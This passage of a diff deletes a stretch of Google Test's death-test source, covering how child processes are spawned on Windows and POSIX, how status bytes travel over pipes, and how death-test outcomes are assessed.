-  } else if (WIFSIGNALED(exit_code)) {
-    m << "Terminated by signal " << WTERMSIG(exit_code);
-  }
-#  ifdef WCOREDUMP
-  if (WCOREDUMP(exit_code)) {
-    m << " (core dumped)";
-  }
-#  endif
-# endif  // GTEST_OS_WINDOWS
-
-  return m.GetString();
-}
-
-// Returns true if exit_status describes a process that was terminated
-// by a signal, or exited normally with a nonzero exit code.
-bool ExitedUnsuccessfully(int exit_status) {
-  return !ExitedWithCode(0)(exit_status);
-}
-
-# if !GTEST_OS_WINDOWS
-// Generates a textual failure message when a death test finds more than
-// one thread running, or cannot determine the number of threads, prior
-// to executing the given statement.  It is the responsibility of the
-// caller not to pass a thread_count of 1.
-static std::string DeathTestThreadWarning(size_t thread_count) {
-  Message msg;
-  msg << "Death tests use fork(), which is unsafe particularly"
-      << " in a threaded context. For this test, " << GTEST_NAME_ << " ";
-  if (thread_count == 0)
-    msg << "couldn't detect the number of threads.";
-  else
-    msg << "detected " << thread_count << " threads.";
-  return msg.GetString();
-}
-# endif  // !GTEST_OS_WINDOWS
-
-// Flag characters for reporting a death test that did not die.
-static const char kDeathTestLived = 'L';
-static const char kDeathTestReturned = 'R';
-static const char kDeathTestThrew = 'T';
-static const char kDeathTestInternalError = 'I';
-
-// An enumeration describing all of the possible ways that a death test can
-// conclude.  DIED means that the process died while executing the test
-// code; LIVED means that process lived beyond the end of the test code;
-// RETURNED means that the test statement attempted to execute a return
-// statement, which is not allowed; THREW means that the test statement
-// returned control by throwing an exception.  IN_PROGRESS means the test
-// has not yet concluded.
-// TODO(vladl@google.com): Unify names and possibly values for
-// AbortReason, DeathTestOutcome, and flag characters above.
-enum DeathTestOutcome { IN_PROGRESS, DIED, LIVED, RETURNED, THREW };
-
-// Routine for aborting the program which is safe to call from an
-// exec-style death test child process, in which case the error
-// message is propagated back to the parent process.  Otherwise, the
-// message is simply printed to stderr.  In either case, the program
-// then exits with status 1.
-void DeathTestAbort(const std::string& message) {
-  // On a POSIX system, this function may be called from a threadsafe-style
-  // death test child process, which operates on a very small stack.  Use
-  // the heap for any additional non-minuscule memory requirements.
-  const InternalRunDeathTestFlag* const flag =
-      GetUnitTestImpl()->internal_run_death_test_flag();
-  if (flag != NULL) {
-    FILE* parent = posix::FDOpen(flag->write_fd(), "w");
-    fputc(kDeathTestInternalError, parent);
-    fprintf(parent, "%s", message.c_str());
-    fflush(parent);
-    _exit(1);
-  } else {
-    fprintf(stderr, "%s", message.c_str());
-    fflush(stderr);
-    posix::Abort();
-  }
-}
-
-// A replacement for CHECK that calls DeathTestAbort if the assertion
-// fails.
-# define GTEST_DEATH_TEST_CHECK_(expression) \
-  do { \
-    if (!::testing::internal::IsTrue(expression)) { \
-      DeathTestAbort( \
-          ::std::string("CHECK failed: File ") + __FILE__ +  ", line " \
-          + ::testing::internal::StreamableToString(__LINE__) + ": " \
-          + #expression); \
-    } \
-  } while (::testing::internal::AlwaysFalse())
-
-// This macro is similar to GTEST_DEATH_TEST_CHECK_, but it is meant for
-// evaluating any system call that fulfills two conditions: it must return
-// -1 on failure, and set errno to EINTR when it is interrupted and
-// should be tried again.  The macro expands to a loop that repeatedly
-// evaluates the expression as long as it evaluates to -1 and sets
-// errno to EINTR.  If the expression evaluates to -1 but errno is
-// something other than EINTR, DeathTestAbort is called.
-# define GTEST_DEATH_TEST_CHECK_SYSCALL_(expression) \
-  do { \
-    int gtest_retval; \
-    do { \
-      gtest_retval = (expression); \
-    } while (gtest_retval == -1 && errno == EINTR); \
-    if (gtest_retval == -1) { \
-      DeathTestAbort( \
-          ::std::string("CHECK failed: File ") + __FILE__ + ", line " \
-          + ::testing::internal::StreamableToString(__LINE__) + ": " \
-          + #expression + " != -1"); \
-    } \
-  } while (::testing::internal::AlwaysFalse())
-
-// Returns the message describing the last system error in errno.
-std::string GetLastErrnoDescription() {
-    return errno == 0 ? "" : posix::StrError(errno);
-}
-
-// This is called from a death test parent process to read a failure
-// message from the death test child process and log it with the FATAL
-// severity. On Windows, the message is read from a pipe handle. On other
-// platforms, it is read from a file descriptor.
-static void FailFromInternalError(int fd) {
-  Message error;
-  char buffer[256];
-  int num_read;
-
-  do {
-    while ((num_read = posix::Read(fd, buffer, 255)) > 0) {
-      buffer[num_read] = '\0';
-      error << buffer;
-    }
-  } while (num_read == -1 && errno == EINTR);
-
-  if (num_read == 0) {
-    GTEST_LOG_(FATAL) << error.GetString();
-  } else {
-    const int last_error = errno;
-    GTEST_LOG_(FATAL) << "Error while reading death test internal: "
-                      << GetLastErrnoDescription() << " [" << last_error << "]";
-  }
-}
-
-// Death test constructor.  Increments the running death test count
-// for the current test.
-DeathTest::DeathTest() {
-  TestInfo* const info = GetUnitTestImpl()->current_test_info();
-  if (info == NULL) {
-    DeathTestAbort("Cannot run a death test outside of a TEST or "
-                   "TEST_F construct");
-  }
-}
-
-// Creates and returns a death test by dispatching to the current
-// death test factory.
-bool DeathTest::Create(const char* statement, const RE* regex,
-                       const char* file, int line, DeathTest** test) {
-  return GetUnitTestImpl()->death_test_factory()->Create(
-      statement, regex, file, line, test);
-}
-
-const char* DeathTest::LastMessage() {
-  return last_death_test_message_.c_str();
-}
-
-void DeathTest::set_last_death_test_message(const std::string& message) {
-  last_death_test_message_ = message;
-}
-
-std::string DeathTest::last_death_test_message_;
-
-// Provides cross platform implementation for some death functionality.
-class DeathTestImpl : public DeathTest {
- protected:
-  DeathTestImpl(const char* a_statement, const RE* a_regex)
-      : statement_(a_statement),
-        regex_(a_regex),
-        spawned_(false),
-        status_(-1),
-        outcome_(IN_PROGRESS),
-        read_fd_(-1),
-        write_fd_(-1) {}
-
-  // read_fd_ is expected to be closed and cleared by a derived class.
-  ~DeathTestImpl() { GTEST_DEATH_TEST_CHECK_(read_fd_ == -1); }
-
-  void Abort(AbortReason reason);
-  virtual bool Passed(bool status_ok);
-
-  const char* statement() const { return statement_; }
-  const RE* regex() const { return regex_; }
-  bool spawned() const { return spawned_; }
-  void set_spawned(bool is_spawned) { spawned_ = is_spawned; }
-  int status() const { return status_; }
-  void set_status(int a_status) { status_ = a_status; }
-  DeathTestOutcome outcome() const { return outcome_; }
-  void set_outcome(DeathTestOutcome an_outcome) { outcome_ = an_outcome; }
-  int read_fd() const { return read_fd_; }
-  void set_read_fd(int fd) { read_fd_ = fd; }
-  int write_fd() const { return write_fd_; }
-  void set_write_fd(int fd) { write_fd_ = fd; }
-
-  // Called in the parent process only. Reads the result code of the death
-  // test child process via a pipe, interprets it to set the outcome_
-  // member, and closes read_fd_.  Outputs diagnostics and terminates in
-  // case of unexpected codes.
-  void ReadAndInterpretStatusByte();
-
- private:
-  // The textual content of the code this object is testing.  This class
-  // doesn't own this string and should not attempt to delete it.
-  const char* const statement_;
-  // The regular expression which test output must match.  DeathTestImpl
-  // doesn't own this object and should not attempt to delete it.
-  const RE* const regex_;
-  // True if the death test child process has been successfully spawned.
-  bool spawned_;
-  // The exit status of the child process.
-  int status_;
-  // How the death test concluded.
-  DeathTestOutcome outcome_;
-  // Descriptor to the read end of the pipe to the child process.  It is
-  // always -1 in the child process.  The child keeps its write end of the
-  // pipe in write_fd_.
-  int read_fd_;
-  // Descriptor to the child's write end of the pipe to the parent process.
-  // It is always -1 in the parent process.  The parent keeps its end of the
-  // pipe in read_fd_.
-  int write_fd_;
-};
-
-// Called in the parent process only. Reads the result code of the death
-// test child process via a pipe, interprets it to set the outcome_
-// member, and closes read_fd_.  Outputs diagnostics and terminates in
-// case of unexpected codes.
-void DeathTestImpl::ReadAndInterpretStatusByte() {
-  char flag;
-  int bytes_read;
-
-  // The read() here blocks until data is available (signifying the
-  // failure of the death test) or until the pipe is closed (signifying
-  // its success), so it's okay to call this in the parent before
-  // the child process has exited.
-  do {
-    bytes_read = posix::Read(read_fd(), &flag, 1);
-  } while (bytes_read == -1 && errno == EINTR);
-
-  if (bytes_read == 0) {
-    set_outcome(DIED);
-  } else if (bytes_read == 1) {
-    switch (flag) {
-      case kDeathTestReturned:
-        set_outcome(RETURNED);
-        break;
-      case kDeathTestThrew:
-        set_outcome(THREW);
-        break;
-      case kDeathTestLived:
-        set_outcome(LIVED);
-        break;
-      case kDeathTestInternalError:
-        FailFromInternalError(read_fd());  // Does not return.
-        break;
-      default:
-        GTEST_LOG_(FATAL) << "Death test child process reported "
-                          << "unexpected status byte ("
-                          << static_cast<unsigned int>(flag) << ")";
-    }
-  } else {
-    GTEST_LOG_(FATAL) << "Read from death test child process failed: "
-                      << GetLastErrnoDescription();
-  }
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(posix::Close(read_fd()));
-  set_read_fd(-1);
-}
-
-// Signals that the death test code which should have exited, didn't.
-// Should be called only in a death test child process.
-// Writes a status byte to the child's status file descriptor, then
-// calls _exit(1).
-void DeathTestImpl::Abort(AbortReason reason) {
-  // The parent process considers the death test to be a failure if
-  // it finds any data in our pipe.  So, here we write a single flag byte
-  // to the pipe, then exit.
-  const char status_ch =
-      reason == TEST_DID_NOT_DIE ? kDeathTestLived :
-      reason == TEST_THREW_EXCEPTION ? kDeathTestThrew : kDeathTestReturned;
-
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(posix::Write(write_fd(), &status_ch, 1));
-  // We are leaking the descriptor here because on some platforms (i.e.,
-  // when built as Windows DLL), destructors of global objects will still
-  // run after calling _exit(). On such systems, write_fd_ will be
-  // indirectly closed from the destructor of UnitTestImpl, causing double
-  // close if it is also closed here. On debug configurations, double close
-  // may assert. As there are no in-process buffers to flush here, we are
-  // relying on the OS to close the descriptor after the process terminates
-  // when the destructors are not run.
-  _exit(1);  // Exits w/o any normal exit hooks (we were supposed to crash)
-}
-
-// Returns an indented copy of stderr output for a death test.
-// This makes distinguishing death test output lines from regular log lines
-// much easier.
-static ::std::string FormatDeathTestOutput(const ::std::string& output) {
-  ::std::string ret;
-  for (size_t at = 0; ; ) {
-    const size_t line_end = output.find('\n', at);
-    ret += "[  DEATH   ] ";
-    if (line_end == ::std::string::npos) {
-      ret += output.substr(at);
-      break;
-    }
-    ret += output.substr(at, line_end + 1 - at);
-    at = line_end + 1;
-  }
-  return ret;
-}
-
-// Assesses the success or failure of a death test, using both private
-// members which have previously been set, and one argument:
-//
-// Private data members:
-//   outcome:  An enumeration describing how the death test
-//             concluded: DIED, LIVED, THREW, or RETURNED.  The death test
-//             fails in the latter three cases.
-//   status:   The exit status of the child process. On *nix, it is in the
-//             in the format specified by wait(2). On Windows, this is the
-//             value supplied to the ExitProcess() API or a numeric code
-//             of the exception that terminated the program.
-//   regex:    A regular expression object to be applied to
-//             the test's captured standard error output; the death test
-//             fails if it does not match.
-//
-// Argument:
-//   status_ok: true if exit_status is acceptable in the context of
-//              this particular death test, which fails if it is false
-//
-// Returns true iff all of the above conditions are met.  Otherwise, the
-// first failing condition, in the order given above, is the one that is
-// reported. Also sets the last death test message string.
-bool DeathTestImpl::Passed(bool status_ok) {
-  if (!spawned())
-    return false;
-
-  const std::string error_message = GetCapturedStderr();
-
-  bool success = false;
-  Message buffer;
-
-  buffer << "Death test: " << statement() << "\n";
-  switch (outcome()) {
-    case LIVED:
-      buffer << "    Result: failed to die.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case THREW:
-      buffer << "    Result: threw an exception.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case RETURNED:
-      buffer << "    Result: illegal return in test statement.\n"
-             << " Error msg:\n" << FormatDeathTestOutput(error_message);
-      break;
-    case DIED:
-      if (status_ok) {
-        const bool matched = RE::PartialMatch(error_message.c_str(), *regex());
-        if (matched) {
-          success = true;
-        } else {
-          buffer << "    Result: died but not with expected error.\n"
-                 << "  Expected: " << regex()->pattern() << "\n"
-                 << "Actual msg:\n" << FormatDeathTestOutput(error_message);
-        }
-      } else {
-        buffer << "    Result: died but not with expected exit code:\n"
-               << "            " << ExitSummary(status()) << "\n"
-               << "Actual msg:\n" << FormatDeathTestOutput(error_message);
-      }
-      break;
-    case IN_PROGRESS:
-    default:
-      GTEST_LOG_(FATAL)
-          << "DeathTest::Passed somehow called before conclusion of test";
-  }
-
-  DeathTest::set_last_death_test_message(buffer.GetString());
-  return success;
-}
-
-# if GTEST_OS_WINDOWS
-// WindowsDeathTest implements death tests on Windows. Due to the
-// specifics of starting new processes on Windows, death tests there are
-// always threadsafe, and Google Test considers the
-// --gtest_death_test_style=fast setting to be equivalent to
-// --gtest_death_test_style=threadsafe there.
-//
-// A few implementation notes:  Like the Linux version, the Windows
-// implementation uses pipes for child-to-parent communication. But due to
-// the specifics of pipes on Windows, some extra steps are required:
-//
-// 1. The parent creates a communication pipe and stores handles to both
-//    ends of it.
-// 2. The parent starts the child and provides it with the information
-//    necessary to acquire the handle to the write end of the pipe.
-// 3. The child acquires the write end of the pipe and signals the parent
-//    using a Windows event.
-// 4. Now the parent can release the write end of the pipe on its side. If
-//    this is done before step 3, the object's reference count goes down to
-//    0 and it is destroyed, preventing the child from acquiring it. The
-//    parent now has to release it, or read operations on the read end of
-//    the pipe will not return when the child terminates.
-// 5. The parent reads child's output through the pipe (outcome code and
-//    any possible error messages) from the pipe, and its stderr and then
-//    determines whether to fail the test.
-//
-// Note: to distinguish Win32 API calls from the local method and function
-// calls, the former are explicitly resolved in the global namespace.
-//
-class WindowsDeathTest : public DeathTestImpl {
- public:
-  WindowsDeathTest(const char* a_statement,
-                   const RE* a_regex,
-                   const char* file,
-                   int line)
-      : DeathTestImpl(a_statement, a_regex), file_(file), line_(line) {}
-
-  // All of these virtual functions are inherited from DeathTest.
-  virtual int Wait();
-  virtual TestRole AssumeRole();
-
- private:
-  // The name of the file in which the death test is located.
-  const char* const file_;
-  // The line number on which the death test is located.
-  const int line_;
-  // Handle to the write end of the pipe to the child process.
-  AutoHandle write_handle_;
-  // Child process handle.
-  AutoHandle child_handle_;
-  // Event the child process uses to signal the parent that it has
-  // acquired the handle to the write end of the pipe. After seeing this
-  // event the parent can release its own handles to make sure its
-  // ReadFile() calls return when the child terminates.
-  AutoHandle event_handle_;
-};
-
-// Waits for the child in a death test to exit, returning its exit
-// status, or 0 if no child process exists.  As a side effect, sets the
-// outcome data member.
-int WindowsDeathTest::Wait() {
-  if (!spawned())
-    return 0;
-
-  // Wait until the child either signals that it has acquired the write end
-  // of the pipe or it dies.
-  const HANDLE wait_handles[2] = { child_handle_.Get(), event_handle_.Get() };
-  switch (::WaitForMultipleObjects(2,
-                                   wait_handles,
-                                   FALSE,  // Waits for any of the handles.
-                                   INFINITE)) {
-    case WAIT_OBJECT_0:
-    case WAIT_OBJECT_0 + 1:
-      break;
-    default:
-      GTEST_DEATH_TEST_CHECK_(false);  // Should not get here.
-  }
-
-  // The child has acquired the write end of the pipe or exited.
-  // We release the handle on our side and continue.
-  write_handle_.Reset();
-  event_handle_.Reset();
-
-  ReadAndInterpretStatusByte();
-
-  // Waits for the child process to exit if it haven't already. This
-  // returns immediately if the child has already exited, regardless of
-  // whether previous calls to WaitForMultipleObjects synchronized on this
-  // handle or not.
-  GTEST_DEATH_TEST_CHECK_(
-      WAIT_OBJECT_0 == ::WaitForSingleObject(child_handle_.Get(),
-                                             INFINITE));
-  DWORD status_code;
-  GTEST_DEATH_TEST_CHECK_(
-      ::GetExitCodeProcess(child_handle_.Get(), &status_code) != FALSE);
-  child_handle_.Reset();
-  set_status(static_cast<int>(status_code));
-  return status();
-}
-
-// The AssumeRole process for a Windows death test.  It creates a child
-// process with the same executable as the current process to run the
-// death test.  The child process is given the --gtest_filter and
-// --gtest_internal_run_death_test flags such that it knows to run the
-// current death test only.
-DeathTest::TestRole WindowsDeathTest::AssumeRole() {
-  const UnitTestImpl* const impl = GetUnitTestImpl();
-  const InternalRunDeathTestFlag* const flag =
-      impl->internal_run_death_test_flag();
-  const TestInfo* const info = impl->current_test_info();
-  const int death_test_index = info->result()->death_test_count();
-
-  if (flag != NULL) {
-    // ParseInternalRunDeathTestFlag() has performed all the necessary
-    // processing.
-    set_write_fd(flag->write_fd());
-    return EXECUTE_TEST;
-  }
-
-  // WindowsDeathTest uses an anonymous pipe to communicate results of
-  // a death test.
-  SECURITY_ATTRIBUTES handles_are_inheritable = {
-    sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
-  HANDLE read_handle, write_handle;
-  GTEST_DEATH_TEST_CHECK_(
-      ::CreatePipe(&read_handle, &write_handle, &handles_are_inheritable,
-                   0)  // Default buffer size.
-      != FALSE);
-  set_read_fd(::_open_osfhandle(reinterpret_cast<intptr_t>(read_handle),
-                                O_RDONLY));
-  write_handle_.Reset(write_handle);
-  event_handle_.Reset(::CreateEvent(
-      &handles_are_inheritable,
-      TRUE,    // The event will automatically reset to non-signaled state.
-      FALSE,   // The initial state is non-signalled.
-      NULL));  // The even is unnamed.
-  GTEST_DEATH_TEST_CHECK_(event_handle_.Get() != NULL);
-  const std::string filter_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kFilterFlag + "=" +
-      info->test_case_name() + "." + info->name();
-  const std::string internal_flag =
-      std::string("--") + GTEST_FLAG_PREFIX_ + kInternalRunDeathTestFlag +
-      "=" + file_ + "|" + StreamableToString(line_) + "|" +
-      StreamableToString(death_test_index) + "|" +
-      StreamableToString(static_cast<unsigned int>(::GetCurrentProcessId())) +
-      // size_t has the same width as pointers on both 32-bit and 64-bit
-      // Windows platforms.
-      // See http://msdn.microsoft.com/en-us/library/tcxf1dw6.aspx.
-      "|" + StreamableToString(reinterpret_cast<size_t>(write_handle)) +
-      "|" + StreamableToString(reinterpret_cast<size_t>(event_handle_.Get()));
-
-  char executable_path[_MAX_PATH + 1];  // NOLINT
-  GTEST_DEATH_TEST_CHECK_(
-      _MAX_PATH + 1 != ::GetModuleFileNameA(NULL,
-                                            executable_path,
-                                            _MAX_PATH));
-
-  std::string command_line =
-      std::string(::GetCommandLineA()) + " " + filter_flag + " \"" +
-      internal_flag + "\"";
-
-  DeathTest::set_last_death_test_message("");
-
-  CaptureStderr();
-  // Flush the log buffers since the log streams are shared with the child.
-  FlushInfoLog();
-
-  // The child process will share the standard handles with the parent.
-  STARTUPINFOA startup_info;
-  memset(&startup_info, 0, sizeof(STARTUPINFO));
-  startup_info.dwFlags = STARTF_USESTDHANDLES;
-  startup_info.hStdInput = ::GetStdHandle(STD_INPUT_HANDLE);
-  startup_info.hStdOutput = ::GetStdHandle(STD_OUTPUT_HANDLE);
-  startup_info.hStdError = ::GetStdHandle(STD_ERROR_HANDLE);
-
-  PROCESS_INFORMATION process_info;
-  GTEST_DEATH_TEST_CHECK_(::CreateProcessA(
-      executable_path,
-      const_cast<char*>(command_line.c_str()),
-      NULL,   // Retuned process handle is not inheritable.
-      NULL,   // Retuned thread handle is not inheritable.
-      TRUE,   // Child inherits all inheritable handles (for write_handle_).
-      0x0,    // Default creation flags.
-      NULL,   // Inherit the parent's environment.
-      UnitTest::GetInstance()->original_working_dir(),
-      &startup_info,
-      &process_info) != FALSE);
-  child_handle_.Reset(process_info.hProcess);
-  ::CloseHandle(process_info.hThread);
-  set_spawned(true);
-  return OVERSEE_TEST;
-}
-# else  // We are not on Windows.
-
-// ForkingDeathTest provides implementations for most of the abstract
-// methods of the DeathTest interface.  Only the AssumeRole method is
-// left undefined.
-class ForkingDeathTest : public DeathTestImpl {
- public:
-  ForkingDeathTest(const char* statement, const RE* regex);
-
-  // All of these virtual functions are inherited from DeathTest.
-  virtual int Wait();
-
- protected:
-  void set_child_pid(pid_t child_pid) { child_pid_ = child_pid; }
-
- private:
-  // PID of child process during death test; 0 in the child process itself.
-  pid_t child_pid_;
-};
-
-// Constructs a ForkingDeathTest.
-ForkingDeathTest::ForkingDeathTest(const char* a_statement, const RE* a_regex)
-    : DeathTestImpl(a_statement, a_regex),
-      child_pid_(-1) {}
-
-// Waits for the child in a death test to exit, returning its exit
-// status, or 0 if no child process exists.  As a side effect, sets the
-// outcome data member.
-int ForkingDeathTest::Wait() {
-  if (!spawned())
-    return 0;
-
-  ReadAndInterpretStatusByte();
-
-  int status_value;
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(waitpid(child_pid_, &status_value, 0));
-  set_status(status_value);
-  return status_value;
-}
-
-// A concrete death test class that forks, then immediately runs the test
-// in the child process.
-class NoExecDeathTest : public ForkingDeathTest {
- public:
-  NoExecDeathTest(const char* a_statement, const RE* a_regex) :
-      ForkingDeathTest(a_statement, a_regex) { }
-  virtual TestRole AssumeRole();
-};
-
-// The AssumeRole process for a fork-and-run death test.  It implements a
-// straightforward fork, with a simple pipe to transmit the status byte.
-DeathTest::TestRole NoExecDeathTest::AssumeRole() {
-  const size_t thread_count = GetThreadCount();
-  if (thread_count != 1) {
-    GTEST_LOG_(WARNING) << DeathTestThreadWarning(thread_count);
-  }
-
-  int pipe_fd[2];
-  GTEST_DEATH_TEST_CHECK_(pipe(pipe_fd) != -1);
-
-  DeathTest::set_last_death_test_message("");
-  CaptureStderr();
-  // When we fork the process below, the log file buffers are copied, but the
-  // file descriptors are shared.  We flush all log files here so that closing
-  // the file descriptors in the child process doesn't throw off the
-  // synchronization between descriptors and buffers in the parent process.
-  // This is as close to the fork as possible to avoid a race condition in case
-  // there are multiple threads running before the death test, and another
-  // thread writes to the log file.
-  FlushInfoLog();
-
-  const pid_t child_pid = fork();
-  GTEST_DEATH_TEST_CHECK_(child_pid != -1);
-  set_child_pid(child_pid);
-  if (child_pid == 0) {
-    GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[0]));
-    set_write_fd(pipe_fd[1]);
-    // Redirects all logging to stderr in the child process to prevent
-    // concurrent writes to the log files.  We capture stderr in the parent
-    // process and append the child process' output to a log.
-    LogToStderr();
-    // Event forwarding to the listeners of event listener API mush be shut
-    // down in death test subprocesses.
-    GetUnitTestImpl()->listeners()->SuppressEventForwarding();
-    g_in_fast_death_test_child = true;
-    return EXECUTE_TEST;
-  } else {
-    GTEST_DEATH_TEST_CHECK_SYSCALL_(close(pipe_fd[1]));
-    set_read_fd(pipe_fd[0]);
-    set_spawned(true);
-    return OVERSEE_TEST;
-  }
-}
-
-// A concrete death test class that forks and re-executes the main
-// program from the beginning, with command-line flags set that cause
-// only this specific death test to be run.
-class ExecDeathTest : public ForkingDeathTest {
- public:
-  ExecDeathTest(const char* a_statement, const RE* a_regex,
-                const char* file, int line) :
-      ForkingDeathTest(a_statement, a_regex), file_(file), line_(line) { }
-  virtual TestRole AssumeRole();
- private:
-  static ::std::vector<testing::internal::string>
-  GetArgvsForDeathTestChildProcess() {
-    ::std::vector<testing::internal::string> args = GetInjectableArgvs();
-    return args;
-  }
-  // The name of the file in which the death test is located.
-  const char* const file_;
-  // The line number on which the death test is located.
-  const int line_;
-};
-
-// Utility class for accumulating command-line arguments.
-class Arguments {
- public:
-  Arguments() {
-    args_.push_back(NULL);
-  }
-
-  ~Arguments() {
-    for (std::vector<char*>::iterator i = args_.begin(); i != args_.end();
-         ++i) {
-      free(*i);
-    }
-  }
-  void AddArgument(const char* argument) {
-    args_.insert(args_.end() - 1, posix::StrDup(argument));
-  }
-
-  template <typename Str>
-  void AddArguments(const ::std::vector<Str>& arguments) {
-    for (typename ::std::vector<Str>::const_iterator i = arguments.begin();
-         i != arguments.end();
-         ++i) {
-      args_.insert(args_.end() - 1, posix::StrDup(i->c_str()));
-    }
-  }
-  char* const* Argv() {
-    return &args_[0];
-  }
-
- private:
-  std::vector<char*> args_;
-};
-
-// A struct that encompasses the arguments to the child process of a
-// threadsafe-style death test process.
-struct ExecDeathTestArgs {
-  char* const* argv;  // Command-line arguments for the child's call to exec
-  int close_fd;       // File descriptor to close; the read end of a pipe
-};
-
-#  if GTEST_OS_MAC
-inline char** GetEnviron() {
-  // When Google Test is built as a framework on MacOS X, the environ variable
-  // is unavailable. Apple's documentation (man environ) recommends using
-  // _NSGetEnviron() instead.
-  return *_NSGetEnviron();
-}
-#  else
-// Some POSIX platforms expect you to declare environ. extern "C" makes
-// it reside in the global namespace.
-extern "C" char** environ;
-inline char** GetEnviron() { return environ; }
-#  endif  // GTEST_OS_MAC
-
-#  if !GTEST_OS_QNX
-// The main function for a threadsafe-style death test child process.
-// This function is called in a clone()-ed process and thus must avoid
-// any potentially unsafe operations like malloc or libc functions.
-static int ExecDeathTestChildMain(void* child_arg) {
-  ExecDeathTestArgs* const args = static_cast<ExecDeathTestArgs*>(child_arg);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(args->close_fd));
-
-  // We need to execute the test program in the same environment where
-  // it was originally invoked.  Therefore we change to the original
-  // working directory first.
-  const char* const original_dir =
-      UnitTest::GetInstance()->original_working_dir();
-  // We can safely call chdir() as it's a direct system call.
-  if (chdir(original_dir) != 0) {
-    DeathTestAbort(std::string("chdir(\"") + original_dir + "\") failed: " +
-                   GetLastErrnoDescription());
-    return EXIT_FAILURE;
-  }
-
-  // We can safely call execve() as it's a direct system call.  We
-  // cannot use execvp() as it's a libc function and thus potentially
-  // unsafe.  Since execve() doesn't search the PATH, the user must
-  // invoke the test program via a valid path that contains at least
-  // one path separator.
-  execve(args->argv[0], args->argv, GetEnviron());
-  DeathTestAbort(std::string("execve(") + args->argv[0] + ", ...) in " +
-                 original_dir + " failed: " +
-                 GetLastErrnoDescription());
-  return EXIT_FAILURE;
-}
-#  endif  // !GTEST_OS_QNX
-
-// Two utility routines that together determine the direction the stack
-// grows.
-// This could be accomplished more elegantly by a single recursive
-// function, but we want to guard against the unlikely possibility of
-// a smart compiler optimizing the recursion away.
-//
-// GTEST_NO_INLINE_ is required to prevent GCC 4.6 from inlining
-// StackLowerThanAddress into StackGrowsDown, which then doesn't give
-// correct answer.
-void StackLowerThanAddress(const void* ptr, bool* result) GTEST_NO_INLINE_;
-void StackLowerThanAddress(const void* ptr, bool* result) {
-  int dummy;
-  *result = (&dummy < ptr);
-}
-
-// Make sure AddressSanitizer does not tamper with the stack here.
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-bool StackGrowsDown() {
-  int dummy;
-  bool result;
-  StackLowerThanAddress(&dummy, &result);
-  return result;
-}
-
-// Spawns a child process with the same executable as the current process in
-// a thread-safe manner and instructs it to run the death test.  The
-// implementation uses fork(2) + exec.  On systems where clone(2) is
-// available, it is used instead, being slightly more thread-safe.  On QNX,
-// fork supports only single-threaded environments, so this function uses
-// spawn(2) there instead.  The function dies with an error message if
-// anything goes wrong.
-static pid_t ExecDeathTestSpawnChild(char* const* argv, int close_fd) {
-  ExecDeathTestArgs args = { argv, close_fd };
-  pid_t child_pid = -1;
-
-#  if GTEST_OS_QNX
-  // Obtains the current directory and sets it to be closed in the child
-  // process.
-  const int cwd_fd = open(".", O_RDONLY);
-  GTEST_DEATH_TEST_CHECK_(cwd_fd != -1);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fcntl(cwd_fd, F_SETFD, FD_CLOEXEC));
-  // We need to execute the test program in the same environment where
-  // it was originally invoked.  Therefore we change to the original
-  // working directory first.
-  const char* const original_dir =
-      UnitTest::GetInstance()->original_working_dir();
-  // We can safely call chdir() as it's a direct system call.
-  if (chdir(original_dir) != 0) {
-    DeathTestAbort(std::string("chdir(\"") + original_dir + "\") failed: " +
-                   GetLastErrnoDescription());
-    return EXIT_FAILURE;
-  }
-
-  int fd_flags;
-  // Set close_fd to be closed after spawn.
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fd_flags = fcntl(close_fd, F_GETFD));
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(fcntl(close_fd, F_SETFD,
-                                        fd_flags | FD_CLOEXEC));
-  struct inheritance inherit = {0};
-  // spawn is a system call.
-  child_pid = spawn(args.argv[0], 0, NULL, &inherit, args.argv, GetEnviron());
-  // Restores the current working directory.
-  GTEST_DEATH_TEST_CHECK_(fchdir(cwd_fd) != -1);
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(close(cwd_fd));
-
-#  else   // GTEST_OS_QNX
-#   if GTEST_OS_LINUX
-  // When a SIGPROF signal is received while fork() or clone() are executing,
-  // the process may hang. To avoid this, we ignore SIGPROF here and re-enable
-  // it after the call to fork()/clone() is complete.
-  struct sigaction saved_sigprof_action;
-  struct sigaction ignore_sigprof_action;
-  memset(&ignore_sigprof_action, 0, sizeof(ignore_sigprof_action));
-  sigemptyset(&ignore_sigprof_action.sa_mask);
-  ignore_sigprof_action.sa_handler = SIG_IGN;
-  GTEST_DEATH_TEST_CHECK_SYSCALL_(sigaction(
-      SIGPROF, &ignore_sigprof_action, &saved_sigprof_action));
-#   endif  // GTEST_OS_LINUX
-
-#   if GTEST_HAS_CLONE
-  const bool use_fork = GTEST_FLAG(death_test_use_fork);
-
-  if (!use_fork) {
-    static const bool stack_grows_down = StackGrowsDown();
-    const size_t stack_size = getpagesize();
-    // MMAP_ANONYMOUS is not defined on Mac, so we use MAP_ANON instead.
-    void* const stack = mmap(NULL, stack_size, PROT_READ | PROT_WRITE,
-                             MAP_ANON | MAP_PRIVATE, -1, 0);
-    GTEST_DEATH_TEST_CHECK_(stack != MAP_FAILED);
-
-    // Maximum stack alignment in bytes:  For a downward-growing stack, this
-    // amount is subtracted from size of the stack space to get an address
-    // that is within the stack space and is aligned on all systems we care
-    // about.  As far as I know there is no ABI with stack alignment greater
-    // than 64.  We assume stack and stack_size already have alignment of
-    // kMaxStackAlignment.
-    const size_t kMaxStackAlignment = 64;
-    void* const stack_top =
-        static_cast<char*>(stack) +
-            (stack_grows_down ? stack_size - kMaxStackAlignment : 0);
-    GTEST_DEATH_TEST_CHECK_(stack_size > kMaxStackAlignment &&
-        reinterpret_cast<intptr_t>(stack_top) % kMaxStackAlignment == 0);
-
-    child_pid = clone(&ExecDeathTestChildMain, stack_top, SIGCHLD, &args);
-
